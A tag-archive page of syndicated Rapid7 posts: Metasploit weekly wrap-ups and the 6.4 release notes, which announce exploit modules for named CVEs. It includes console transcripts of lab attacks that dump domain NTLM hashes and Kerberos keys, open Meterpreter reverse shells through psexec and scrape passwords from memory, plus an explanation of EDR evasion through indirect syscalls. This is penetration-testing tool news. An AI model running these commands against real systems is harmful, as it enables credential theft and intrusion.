Tag Archives: Metasploit

Metasploit Weekly Wrap-Up 04/12/24

Post Syndicated from Simon Janusz original https://blog.rapid7.com/2024/04/12/metasploit-weekly-wrap-up-04-12-24/

Account Takeover using Shadow Credentials

Metasploit Weekly Wrap-Up 04/12/24

The new release of Metasploit Framework includes a Shadow Credentials module added by smashery used for reliably taking over an Active Directory user account or computer, and letting future authentication to happen as that account. This can be chained with other modules present in Metasploit Framework such as windows_secrets_dump.

Details

The module targets a ‘victim’ account that is part of a domain where the Domain Controller is running Windows Server 2016 and newer.

Using an account that has write permissions over another (or its own) user account object, the module adds a public key credential object to the user account’s msDS-KeyCredentialLink property. After this, a Ticket Granting Ticket can be requested using the get_ticket module, which subsequently can be used for a pass-the-ticket style attack such as auxiliary/gather/windows_secrets_dump. This can be performed when a user contains the GenericWrite permission over another account. By default, Computer accounts have the ability to write their own value (whereas user accounts do not).

The shadow credentials added persist between password changes, making it a very useful technique for getting the TGT.

The steps for this technique (performed automatically by the module) are:
Generate and store a key and certificate locally
Store the certificate’s public key as a KeyCredential
On the domain controller, update the msDS-KeyCredentialLink property to include the newly generated KeyCredential object

After the above steps, you can:
Obtain a TGT & NTLM hash
Perform further attacks using the above values

New module content (3)

Shadow Credentials

Authors: Elad Shamir and smashery
Type: Auxiliary
Pull request: #19051 contributed by smashery
Path: admin/ldap/shadow_credentials

Description: A new module to add to, list, flush and delete from the LDAP msDS-KeyCredentialLink attribute which enables the user to execute "shadow credential" attacks for persistence and lateral movement.

Gibbon School Platform Authenticated PHP Deserialization Vulnerability

Authors: Ali Maharramli, Fikrat Guliev, Islam Rzayev, and h00die-gr3y [email protected]
Type: Exploit
Pull request: #19044 contributed by h00die-gr3y
Path: multi/http/gibbon_auth_rce_cve_2024_24725
AttackerKB reference: CVE-2024-24725

Description: An exploit module that exploits Gibbon online school platform version 26.0.00 and lower to achieve remote code execution. Note that authentication is required. This leverages a PHP deserialization attack via columnOrder in a POST request (CVE-2024-24725).

Rancher Audit Log Sensitive Information Leak

Author: h00die
Type: Post
Pull request: #18962 contributed by h00die
Path: linux/gather/rancher_audit_log_leak
AttackerKB reference: CVE-2023-22649

Description: A post module to leverage CVE-2023-22649 which is a sensitive information leak in the rancher service’s audit logs.

Enhancements and features (4)

  • #19022 from sjanusz-r7 – Adds support to detect the MySQL server’s host’s platform and arch by running a query.
  • #19045 from zgoldman-r7 – Adds a set of acceptance tests for MSSQL modules.
  • #19052 from smashery – Updates Metasploit’s User Agent strings to values valid for April 2024.
  • #19064 from nrathaus – Adds support to the auxiliary/scanner/snmp/snmp_login module to work over the TCP protocol in addition to UDP.

Bugs fixed (3)

  • #19056 from dwelch-r7 – Fixed an issue were the socket would be closed if targeting a single host with multiple user_file/pass_file module option combinations. This was caused when a session was successfully opened but then the next login attempt would close the socket being used by the newly created session.
  • #19059 from nrathaus – Fixed an issue with the psnuffle module’s POP3 support.
  • #19069 from adfoster-r7 – Fixed an edgecase present in clients that programmatically interacted with Metasploit’s remote procedure call (RPC) functionality that caused the login modules for SMB, Postgres, MySQL, and MSSQL to open a new session by default instead of it being opt in behavior.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 04/05/2024

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2024/04/05/metasploit-weekly-wrap-up-04-05-2024/

New ESC4 Templates for AD CS

Metasploit Weekly Wrap-Up 04/05/2024

Metasploit added capabilities for exploiting the ESC family of flaws in AD CS in Metasploit 6.3. The ESC4 technique in particular has been supported for some time now thanks to the ad_cs_cert_templates module which enables users to read and write certificate template objects. This facilitates the exploitation of ESC4 which is a misconfiguration in the access controls of the LDAP object, allowing an attacker to tamper with them. This is typically used by an attacker to modify a certificate template object they are capable of modifying to make it susceptible to ESC1. Metasploit offers a premade template for ESC1 that a user could select to perform this attack.

This attack workflow was expanded on this week with two new templates for ESC2 and ESC3. These new templates allow Metasploit users that are concerned about ESC1 being detected with alternative options for exploitation. Additionally, the premade templates can be edited, to for example restrict permissions to a particular SID by changing the SDDL text of the ntSecurityDescriptor.

New module content (2)

WatchGuard XTM Firebox Unauthenticated Remote Command Execution

Authors: Charles Fol (Ambionics Security), Dylan Pindur (AssetNote), Misterxid, and h00die-gr3y [email protected]
Type: Exploit
Pull request: #18915 contributed by h00die-gr3y
Path: linux/http/watchguard_firebox_unauth_rce_cve_2022_26318
AttackerKB reference: CVE-2022-26318

Description: This PR adds a module for a buffer overflow at the administration interface of WatchGuard Firebox and XTM appliances. The appliances are built from a cherrypy python backend sending XML-RPC requests to a C binary called wgagent using pre-authentication endpoint /agent/login. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.

Jenkins CLI Ampersand Replacement Arbitrary File Read

Authors: Vozec, Yaniv Nizry, binganao, h00die, and h4x0r-dz
Type: Auxiliary
Pull request: #18764 contributed by h00die
Path: gather/jenkins_cli_ampersand_arbitrary_file_read
AttackerKB reference: CVE-2024-23897

Description: This PR adds a new module to exploit CVE-2024-23897, an unauthorized arbitrary (first 2 lines) file read on Jenkins versions prior to 2.442 or for the LTS stream, versions prior to 2.426.3.

Enhancements and features (4)

  • #18906 from zeroSteiner – This PR adds support for leveraging the ESC4 attack on misconfigured AD-CS servers to introduce ESC2 and ESC3.
  • #18933 from sjanusz-r7 – Updates the new SQL session types to correctly remember previous commands that the user has entered.
  • #19003 from ArchiMoebius – Updates msfvenom and payload generation to support formatting payloads as a Zig buffer.
  • #19014 from cgranleese-r7 – Adds an initial set of acceptance tests for MySQL modules and session types.

Bugs fixed (3)

  • #18935 from zeroSteiner – This PR fixes a common user mistake when authenticating with LDAP modules. Now, users can specify either the USERNAME (user) and DOMAIN (domain.local) datastore options or the original format of just the USERNAME in the UPN format ([email protected]). This fix updates the LDAP library.
  • #19007 from dwelch-r7 – Fixes a regression that affected exploit/multi/http/log4shell_header_injection module which stopped the module from running successfully.
  • #19021 from cgranleese-r7 – Updates the admin/mysql/mysql_enum module to work with newer versions of MySQL.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 03/29/2024

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2024/03/29/metasploit-weekly-wrap-up-03-29-2024/

PHP code execution and Overshare[point]

Metasploit Weekly Wrap-Up 03/29/2024

Here in the Northern Hemisphere, Spring is in the air: flowers, bees, pollen… a new Metasploit 6.4 release, and now, fresh on the heels of this new release is a bountiful crop of exploits, features, and bug-fixes. Leading the pack is a pair of 2024 PHP code execution vulnerabilities in Artica Proxy and the Bricks Builder WordPress theme, and not to be outshone is a pair of Sharepoint vulnerabilities chained to give unauthenticated code execution as administrator.

New module content (3)

Artica Proxy Unauthenticated PHP Deserialization Vulnerability

Authors: Jaggar Henry of KoreLogic Inc. and h00die-gr3y [email protected]
Type: Exploit
Pull request: #18967 contributed by h00die-gr3y
Path: linux/http/artica_proxy_unauth_rce_cve_2024_2054
AttackerKB reference: CVE-2024-2054

Description: The PR adds a module targeting CVE-2024-2054, a command injection vulnerability in Artica Proxy appliance version 4.50 and 4.40. The exploit allows remote unauthenticated attackers to run arbitrary commands as the www-data user.

Unauthenticated RCE in Bricks Builder Theme

Authors: Calvin Alkan and Valentin Lobstein
Type: Exploit
Pull request: #18891 contributed by Chocapikk
Path: multi/http/wp_bricks_builder_rce
AttackerKB reference: CVE-2024-25600

Description: This PR adds an exploit module that targets a known vulnerability, CVE-2024-25600, in the WordPress Bricks Builder Theme, versions prior to 1.9.6.

Sharepoint Dynamic Proxy Generator Unauth RCE

Authors: Jang and jheysel-r7
Type: Exploit
Pull request: #18721 contributed by jheysel-r7
Path: windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce
AttackerKB reference: CVE-2023-24955

Description: This PR adds a module that allows unauthenticated remote code execution as Administrator on Sharepoint 2019 hosts. It performs this by exploiting two vulnerabilities in Sharepoint 2019. First, it uses CVE-2023-29357, an auth bypass patched in June of 2023 to impersonate the Administrator user, then it uses CVE-2023-24955, an RCE patched in May of 2023 to execute commands as Administrator.

Enhancements and features (4)

  • #18925 from sjanusz-r7 – Updates RPC API to include Auxiliary and Exploit modules in session.compatible_modules response.
  • #18982 from ekalinichev-r7 – Adds RPC methods session.interactive_read and session.interactive_write that support interaction with SQL, SMB, and Meterpreter sessions via RPC API.
  • #19016 from zgoldman-r7 – Updates the MSSQL modules to support the GUID column type. This also improves error logging.
  • #19017 from zgoldman-r7 – Improves the auxiliary/admin/mssql/mssql_exec and auxiliary/admin/mssql/mssql_sql modules to have improved error logging.

Bugs fixed (6)

  • #18985 from cgranleese-r7 – Fixes store_valid_credential conditional logic for unix/webapp/wp_admin_shell_upload module.
  • #18992 from adfoster-r7 – Fixes a crash within the postgres version module.
  • #19006 from cgranleese-r7 – This fixes an issue where WMAP plugin module loading was causing failures.
  • #19009 from sjanusz-r7 – Updates modules/exploits/osx/local/persistence to no longer be marked as a compatible module for Windows targets.
  • #19012 from zeroSteiner – This fixes an issue that was reported where msfconsole will fail to start if the user’s /etc/hosts file contained a host name ending in a . or containing _ characters.
  • #19015 from zeroSteiner – Previously, we fixed an issue where Metasploit would crash while parsing the hosts file if it ended in unexpected values like . or _. This fixes the same kind of issue in DNS names that enter the hostnames data through a different path by removing any trailing . so they can be used for DNS resolution.

Documentation added (1)

  • #18961 from zgoldman-r7 – This adds documentation for the new SQL and SMB session types.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Framework 6.4 Released

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2024/03/25/metasploit-framework-6-4-released/

Metasploit Framework 6.4 Released

Today, Metasploit is pleased to announce the release of Metasploit Framework 6.4. It has been just over a year since the release of version 6.3 and the team has added many new features and improvements since then.

For news reporters, please reach out to [email protected].

Kerberos Improvements

Metasploit 6.3 included initial support for Kerberos authentication within Metasploit and was one of the larger features in the release. Since then, Metasploit has continued to make Kerberos-related improvements, adding capabilities that didn’t make it into the 6.3 cut.

  • The auxiliary/admin/kerberos/forge_ticket module was updated with:
    • Support for the diamond and sapphire techniques in addition to the original golden and silver techniques.
    • The additional fields used by Windows Server 2022, enabling its compatibility with the latest Windows targets.
  • We added the post/windows/manage/kerberos_tickets post module, which allows users to dump Kerberos tickets from a compromised host. This is similar functionality to what the popular Rubeus tool’s klist/dump commands do and operates entirely in memory. With this in place, users can now exploit instances of Unconstrained Delegation.
  • The auxiliary/gather/windows_secrets_dump module was updated to support pass-the-ticket authentication when using the DCSync technique (the DOMAIN action). This enables users to dump all of the secrets from the target given only a valid Kerberos ticket with the required permissions instead of requiring authentication by username and password.

Example of running the gather/windows_secrets_dump module with Kerberos authentication and the DOMAIN action:

msf6 auxiliary(gather/windows_secrets_dump) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local action=DOMAIN
[*] Running module against 192.168.123.133

[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGT-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_724176.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_878194.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[*] 192.168.123.133:445 - Opening Service Control Manager
…
[*] 192.168.123.133:445 - Using cached credential for krbtgt/[email protected] [email protected]
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130522_default_192.168.123.133_mit.kerberos.cca_113846.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[*] 192.168.123.133:445 - Bound to DRSR
[*] 192.168.123.133:445 - Decrypting hash for user: CN=Administrator,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=Guest,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=krbtgt,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=vagrant,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=DC01,OU=Domain Controllers,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=DESKTOP-QUUL3FQV,CN=Computers,DC=demo,DC=local
# SID's:
Administrator: S-1-5-21-1242350107-3695253863-3717863007-500
…

# NTLM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:::
…

# Full pwdump format:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202309151519,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::
…

# Kerberos keys:
Administrator:aes256-cts-hmac-sha1-96:f68d8df38809b402cf49799faf991e77d3d931235d1cfa20fab35d348c0fa6a6
…

[*] 192.168.123.133:445 - Cleaning up...
[*] Auxiliary module execution completed

DNS Configuration

One of the major benefits of using the Metasploit framework is the integrated way to pivot connections over established sessions without needing to set up proxies. This means that Metasploit often handles DNS queries for various services as modules are run. Over the past year, Metasploit has made improvements to how it handles its own DNS queries to ensure they are not leaked unintentionally.

Users can configure how hostnames should be resolved. This is particularly useful in pivoting scenarios to ensure that the requests for a specific domain (or all domains) are resolved using a configured nameserver optionally contacted via an established session. As an example, users can configure Metasploit to ensure that their DNS queries for internal resources are originating from a compromised host and not themselves.

Examples of manipulating the DNS configuration:

dns add --rule *.lab.lan --session 1 --index 1 192.0.2.1
dns add --rule honeypot.lab.lan --index 2 black-hole
dns add-static example2.lab.lan 192.0.2.201
dns add --index 1 --rule * static system 192.0.2.1

Viewing the current configuration:

msf6 > dns print
Default search domain: N/A
Default search list:
  * tor.example.com
  * localdomain
Current cache size:    0

Resolver rule entries
=====================

   #  Rule              Resolver    Comm channel
   -  ----              --------    ------------
   1  *.lab.lan         192.0.2.1   Session 1
   2  honeypot.lab.lan  black-hole  N/A
   3  *
   .    \_              static      N/A
   .    \_              10.4.5.45
   .    \_              10.3.20.98


Static hostnames
================

   Hostname          IPv4 Address  IPv6 Address
   --------          ------------  ------------
   example.lab.lan   192.0.2.200
   example2.lab.lan  192.0.2.201

New session types

Metasploit 6.4 adds support for new PostgreSQL, MSSQL, MySQL and SMB session types. The SQL session types allow interactive queries with a remote database instance while the new SMB session will let you interact with a share, navigate directories, upload, and download files. All of these new session types can also be used with relevant auxiliary modules, meaning you can get a single SMB or SQL session and run multiple modules against the session without needing to reconnect each time.

New SMB Session Type Examples

You can open a new SMB session by setting the CreateSession option:

msf6 > use scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > run rhost=192.168.123.133 username=vagrant password=vagrant CreateSession=true

[*] 192.168.123.133:445   - 192.168.123.133:445 - Starting SMB login bruteforce
[+] 192.168.123.133:445   - 192.168.123.133:445 - Success: '.\vagrant:vagrant' Administrator
[!] 192.168.123.133:445   - No active DB -- Credential data will not be saved!
[*] SMB session 2 opened (192.168.123.1:52253 -> 192.168.123.133:445) at 2024-03-19 12:07:15 +0000
[*] 192.168.123.133:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) > 

The session will open as a new SMB session type:

msf6 auxiliary(scanner/smb/smb_login) > sessions
Active sessions
===============
  Id  Name  Type  Information                        Connection
  --  ----  ----  -----------                        ----------
  1         smb   SMB vagrant @ 192.168.123.133:445  192.168.123.1:53541 -> 192.168.123.133:445 (192.168.123.133)
msf6 auxiliary(scanner/smb/smb_login) >

Interacting with the session allows for direct file manipulation of the remote host including upload and download support:

msf6 auxiliary(scanner/smb/smb_login) > sessions -i -1
[*] Starting interaction with 1…
SMB (192.168.123.133) > ls
[-] No active share selected. Use the shares command to view available shares, and shares -i <id> to interact with one
SMB (192.168.123.133) > shares
Shares
======
    #  Name      Type          comment
    -  ----      ----          -------
    0  ADMIN$    DISK|SPECIAL  Remote Admin
    1  C$        DISK|SPECIAL  Default share
    2  foo       DISK
    3  IPC$      IPC|SPECIAL   Remote IPC
    4  NETLOGON  DISK          Logon server share
    5  SYSVOL    DISK          Logon server share

SMB (192.168.123.133) > shares -i foo
[+] Successfully connected to foo
SMB (192.168.123.136\foo) > ls
Shares
======
    #  Type  Name                 Created                    Accessed                   Written                    Changed                    Size
    -  ----  ----                 -------                    --------                   -------                    -------                    ----
    0  DIR   .                    2023-09-15T18:56:07+01:00  2023-10-10T12:39:26+01:00  2023-10-10T12:39:26+01:00  2023-10-10T12:39:26+01:00
    1  DIR   ..                   2021-05-08T09:06:51+01:00  2024-02-01T13:11:41+00:00  2024-02-01T13:11:41+00:00  2024-02-01T13:11:41+00:00
    2  FILE  passwords.docx       2023-10-10T12:34:57+01:00  2023-10-10T12:38:53+01:00  2023-10-10T12:38:53+01:00  2023-10-10T12:38:53+01:00  1403

The new session type supports using existing modules through the session types such as Metasploit’s secret’s dump module which will still keep the session alive afterwards:

msf6 auxiliary(scanner/mysql/mysql_hashdump) > use auxiliary/gather/windows_secrets_dump
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(gather/windows_secrets_dump) > run session=-1

Or you can run Metasploit’s PsExec support with the SMB session to open a Meterpreter session:

msf6 > use windows/smb/psexec
[*] Using configured payload windows/meterpreter/reverse_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 exploit(windows/smb/psexec) > run session=-1
…
[*] Sending stage (176198 bytes) to 10.4.227.91
[*] Meterpreter session 2 opened (10.4.227.91:4444 -> 10.4.227.91:50319) at 2024-03-19 16:41:45 +0000
meterpreter >

Kerberos authentication is also supported:

msf6 auxiliary(scanner/smb/smb_login) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local createsession=true 

[*] 192.168.123.133:445   - 192.168.123.133:445 - Starting SMB login bruteforce
[+] 192.168.123.133:445   - 192.168.123.133:88 - Received a valid TGT-Response
[*] 192.168.123.133:445   - 192.168.123.133:445   - TGT MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20240319164301_default_192.168.123.133_mit.kerberos.cca_903639.bin
[+] 192.168.123.133:445   - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445   - 192.168.123.133:445   - TGS MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20240319164301_default_192.168.123.133_mit.kerberos.cca_231110.bin
[+] 192.168.123.133:445   - 192.168.123.133:88 - Received a valid delegation TGS-Response
[+] 192.168.123.133:445   - 192.168.123.133:445 - Success: 'demo.local\vagrant:vagrant' Administrator
[*] SMB session 3 opened (192.168.123.1:50336 -> 192.168.123.133:445) at 2024-03-19 16:43:01 +0000
[*] 192.168.123.133:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >

New SQL Session Types Examples

Metasploit 6.4 has added support for PostgreSQL, MSSQL, MySQL session types. You can open a new SMB session by setting the CreateSession option:

msf6 > use auxiliary/scanner/mssql_login
msf6 auxiliary(scanner/smb/smb_login) > run CreateSession=true RPORT=1433 RHOSTS=192.168.2.242 USERNAME=user PASSWORD=password

Which will create a new SQL session:

[*] 192.168.2.242:1433    - 192.168.2.242:1433 - MSSQL - Starting authentication scanner.
[!] 192.168.2.242:1433    - No active DB -- Credential data will not be saved!
[+] 192.168.2.242:1433    - 192.168.2.242:1433 - Login Successful: WORKSTATION\user:password
[*] MSSQL session 1 opened (192.168.2.1:60963 -> 192.168.2.242:1433) at 2024-03-15 13:41:31 -0500
[*] 192.168.2.242:1433    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Which you can interact with using sessions -i <session id> or sessions -i -1 to interact with the most recently opened session:

msf6 auxiliary(scanner/mssql/mssql_login) > sessions

Active sessions
===============

  Id  Name  Type   Information                     Connection
  --  ----  ----   -----------                     ----------
  1         mssql  MSSQL test @ 192.168.2.242:143  192.168.2.1:60963 -> 192.168.23                               .242:1433 (192.168.2.242)

msf6 auxiliary(scanner/mssql/mssql_login) > sessions -i 1
[*] Starting interaction with 1…
mssql @ 192.168.2.242:1433 (master) > query 'select @@version;'
Response
========
    #  NULL
    -  ----
    0  Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
	    Oct 8 2022 05:58:25
	    Copyright (C) 2022 Microsoft Corporation
	    Developer Edition (64-bit) on Windows Server 2022 Stand
       ard 10.0 <X64> (Build 20348: ) (Hypervisor)

The query_interactive command will start an interactive prompt for running multiple multi-line queries:

mssql @ 192.168.2.242:1433 (master) > query_interactive
[*] Starting interactive SQL shell for mssql @ 192.168.2.242:1433 (master)
[*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit.
SQL >> select *
SQL *> from information_schema.tables
SQL *> where table_type = 'BASE TABLE';
[*] Executing query: select * from information_schema.tables where table_type = 'BASE TABLE';
Response
========
    #  TABLE_CATALOG  TABLE_SCHEMA  TABLE_NAME             TABLE_TYPE
    -  -------------  ------------  ----------             ----------
    0  master         dbo           spt_fallback_db        BASE TABLE
    1  master         dbo           spt_fallback_dev       BASE TABLE
    2  master         dbo           spt_fallback_usg       BASE TABLE
    4  master         dbo           Users                  BASE TABLE
    5  master         dbo           spt_monitor            BASE TABLE
    6  master         dbo           MSreplication_options  BASE TABLE
SQL >>

Similar to SMB sessions, the new SQL modules can run with multiple auxiliary modules, available modules can be searched for:

msf6 > search session_type:smb session_type:postgres session_type:mssql session_type:mysql

Indirect Syscalls Support for Windows Meterpreter

Indirect system calls are a well-known technique that is often used to bypass EDR/AV detection. This technique is particularly useful when dynamic analysis is performed, where the security software monitors every process on the system to detect any suspicious activity. One common way to do this is to add user-land hooks on Win32 API calls, especially those commonly used by malware. Syscalls are a way to run system routines directly and enter kernel mode without passing through the Win32 API.

This first implementation focuses on substituting the Win32 API calls used by the Reflective DLL Injection (RDI) library with indirect syscalls to the corresponding native APIs. For example, VirtualAlloc has been substituted by a system call to ZwAllocateVirtualMemory. Since RDI is used everywhere by Meterpreter and its extensions, it was a very good candidate for this initial work.

The main difficulty is finding the correct syscall number since it is not the same across Windows versions. Also, EDRs usually hook the NTDLL native API, making the discovery of syscall numbers more challenging. The technique used for this is based on the assumption that the syscall numbers are assigned in a sequential order, starting from the number 0. If we look at how native API functions are stored in memory, the syscall number can be deduced from the position of the related native API function in memory. The technique consists in selecting the system call functions (Zw…) from ntdll.dll exports and sorting them in ascending order of their memory addresses. The syscall number of one given native API function is simply its index in this sorted list. This is very similar to the technique used by Halo’s Gate.

Another technique we incorporated is to ensure the call to the syscall instruction is made through ntdll.dll. This behavior is sometimes referred to as making an “indirect syscall”. EDR/AV can monitor this and flag any system calls not coming from ntdll.dll as suspicious. This technique is directly taken from RecycledGate. Here, the complexity is that Meterpreter must be compatible with all Windows versions from WinXP to the most recent flavors. This implementation will take care of parsing ntdll.dll and get the correct trampoline address that will be used when the system call is executed.

This work is a first step and we expect more additions this year. The next step is to switch additional Win32 API requests that Meterpreter and its extensions make to their corresponding native API using indirect syscalls. The long-term goal is to make indirect syscalls a standard for any future Windows-based development (payload, exploit, etc.). Users do not need to make any changes in order to run Meterpreter with these new changes.

Discoverability Improvements

The definition of “a module” can be a nebulous thing. In recent years, some modules have begun to include multiple CVEs in a single exploit as part of a chain (e.g., Proxy(Not)Shell), while other CVEs affect multiple products and warrant multiple modules (e.g., Log4Shell). Furthermore, modules that aren’t exploiting a particular vulnerability often have different actions they can take, like forging different types of Kerberos tickets or running different LDAP queries for enumeration. As Metasploit development moves quickly, with new content being released each week, it can be difficult for users to find what they’re looking for.

Metasploit 6.4 has made some improvements to make discoverability easier for users. One of the largest changes is the new Hierarchical Search feature. This will cause Metasploit’s internal search capabilities to match additional fields within modules, including the actions, targets and AKA aliases. As an example, this will cause the auxiliary/admin/kerberos/forge_ticket module to show up when the user searches for forge_golden because it is an action of the module:

msf6 auxiliary(scanner/mysql/mysql_hashdump) > search kerberos forge

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  auxiliary/admin/kerberos/forge_ticket                .                normal  No     Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging
   1    \_ action: FORGE_DIAMOND                           .                .       .      Forge a Diamond Ticket
   2    \_ action: FORGE_GOLDEN                            .                .       .      Forge a Golden Ticket
   3    \_ action: FORGE_SAPPHIRE                          .                .       .      Forge a Sapphire Ticket
   4    \_ action: FORGE_SILVER                            .                .       .      Forge a Silver Ticket
   5    \_ AKA: Ticketer                                   .                .       .      .
   6    \_ AKA: Klist                                      .                .       .      .
   7  auxiliary/admin/kerberos/ms14_068_kerberos_checksum  2014-11-18       normal  No     MS14-068 Microsoft Kerberos Checksum Validation Vulnerability


Interact with a module by name or index. For example info 7, use 7 or use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

msf6 auxiliary(scanner/mysql/mysql_hashdump) >

Windows Meterpreter Memory Searching

Metasploit 6.4 incorporates a new feature for Windows Meterpreter that allows for searching a process’s memory for user-specified needles with support for regular expressions. This can be used to search for and find potentially sensitive data in memory near the needles, similar to Linux’s MimiPenguin tool. This can be executed against any process with the same or lower privilege level as the Meterpreter session.

This new API is currently in use by the post/multi/gather/memory_search module, where it can be used to search for plaintext credentials – for instance in some configurations of OpenSSH:

msf6 post(multi/gather/memory_search) > run session=1 regex="publickey,password.*" process_names_glob="ssh*"

[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
[*] Getting target processes...
[*] Running against the following processes:
        ssh.exe (pid: 2972)

[*] Memory Matches for ssh.exe (pid: 2972)
======================================

 Match Address       Match Length  Match Buffer                                                                                    Memory Region Start  Memory Region Size
 -------------       ------------  ------------                                                                                    -------------------  ------------------
 0x0000000A00060DF0  127           "publickey,password......3.......myverysecretpassword....................#.........#..........  0x0000000A00000000   0x0000000000090000
                                   ...........S......................"

[*] Post module execution completed

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro

Thanks to both Rapid7 developers and Metasploit community members for all their hard work on delivering this latest set of Metasploit features, in particular: Alan Foster, Ashley Donaldson, Brendan Watters, Chris Granleese, Christophe de la Fuente, Dean Welch, Jack Heysel, Jacquie Harris, Jeffrey Martin, Navya Harika Karaka, Simon Janusz, Zach Goldman, Egor Kalinichev, and Spencer McIntyre.

Metasploit Weekly Wrap-Up 03/22/2024

Post Syndicated from Egor Kalinichev original https://blog.rapid7.com/2024/03/22/metasploit-weekly-wrap-up-03-22-2024/

New module content (1)

OpenNMS Horizon Authenticated RCE

Metasploit Weekly Wrap-Up 03/22/2024

Author: Erik Wynter
Type: Exploit
Pull request: #18618 contributed by ErikWynter
Path: linux/http/opennms_horizon_authenticated_rce
AttackerKB reference: CVE-2023-0872

Description: This module exploits built-in functionality in OpenNMS Horizon in order to execute arbitrary commands as the opennms user. For versions 32.0.2 and higher, this module requires valid credentials for a user with ROLE_FILESYSTEM_EDITOR privileges and either ROLE_ADMIN or ROLE_REST. For versions 32.0.1 and lower, credentials are required for a user with ROLE_FILESYSTEM_EDITOR, ROLE_REST, and/or ROLE_ADMIN privileges.

Enhancements and features (5)

  • #18838 from SickMcNugget – This adds support for Debian and includes a number of fixes and improvements for the runc_cwd_priv_esc module. Prior to this fix, the module would incorrectly report some of the versions that the patch had been back ported to as vulnerable.
  • #18841 from randomstr1ng – This PR updates the sap_icm_paths.txt wordlist with the newest entries.
  • #18885 from errorxyz – Enhances the sessions command so that both Meterpreter and the top level Metasploit prompt support sessions -i -1.
  • #18978 from dwelch-r7 – This PR updates several login modules to now display some messaging to the end of scans to tell the user how many credentials and/or sessions were successful.
  • #18980 from zgoldman-r7 – Improves the help command wording when interacting with basic shells.

Bugs fixed (2)

  • #18947 from molecula2788 – Fixes an issue with exploits/windows/local/wmi_persistence module when Powershell obfuscation was applied.
  • #18974 from zeroSteiner – Fixes a typo in the help menu of the dns command.

Documentation added (1)

  • #18965 from adfoster-r7 – This PR updates our README.md to remove a stale documentation link.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
